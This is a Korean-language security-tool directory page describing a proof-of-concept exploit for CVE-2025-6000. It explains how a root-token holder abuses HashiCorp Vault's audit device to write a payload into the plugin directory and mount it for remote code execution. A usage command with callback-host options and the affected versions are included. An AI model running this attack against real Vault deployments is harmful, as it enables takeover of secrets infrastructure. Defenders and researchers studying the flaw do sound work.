Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/n0blinder/cve-2025-6000
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubn0blinder/cve-2025-6000

CVE-2025-6000

CVE-2025-6000에 대한 개념 증명 익스플로잇으로, HashiCorp Vault 감사 백엔드에서 권한 상승을 통해 RCE를 달성하여 루트 토큰으로 임의 코드 실행을 가능하게 합니다.

저장소 보기
1일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-6000 — HashiCorp Vault 권한 상승 코드 실행 (PoC)

CVE-2025-6000에 대한 개념 증명(PoC)으로, HashiCorp Vault의 감사(audit) 백엔드에서 발생하는 권한 상승-to-RCE 취약점입니다. 감사 디바이스는 권한 있는 호출자가 prefix, file_path, mode 옵션을 검증 없이 제어할 수 있게 합니다. 실행 가능한 페이로드를 Vault의 plugin_directory에 작성한 다음 이를 플러그인으로 등록하고 마운트함으로써, 루트 토큰을 가진 공격자는 Vault 호스트에서 임의 코드를 실행할 수 있습니다.

데모

https://github.com/user-attachments/assets/f8d6c90a-b511-4e96-8e4d-718c7a765601

영향 범위

  • plugin_directory가 구성된 Vault 0.8.0부터 1.20.0까지.
  • 루트 토큰 또는 이에 상응하는 권한(sys/audit, sys/plugins, sys/mounts) 필요.

사용법

root@kitploit:~
python3 CVE-2025-6000.py <vault-host> <vault-port> --token <root-token> \
    --socket-addr <ip:port Vault dials> \
    --listen-port 9861 \
    --callback-host <your-ip> --callback-port 8000 \
    --cleanup
  • --socket-addr — Vault가 감사 스트림을 위해 연결하는 주소 (VPN IP:포트 또는 ngrok TCP 엔드포인트).
  • --listen-port — 캡처 서버가 바인딩하는 로컬 포트.
  • --callback-host / --callback-port — 실행 확인에 사용되는 HTTP 엔드포인트.
  • --cleanup — 종료 시 감사 디바이스, 플러그인, 마운트를 제거합니다.

캡처가 실패하면 스크립트는 수동 SHA256 프롬프트로 대체됩니다. 모든 옵션은 -h를 실행하세요.

면책 조항

승인된 보안 테스트, 연구 및 교육 목적으로만 사용하세요. 소유한 시스템 또는 명시적인 서면 허가를 받은 시스템에만 사용하십시오. 이 소프트웨어 사용에 대한 책임은 전적으로 사용자에게 있으며, 작성자는 오용이나 손해에 대해 어떠한 책임도 지지 않습니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다.

라이선스

MIT — LICENSE 참조.

도구 다운로드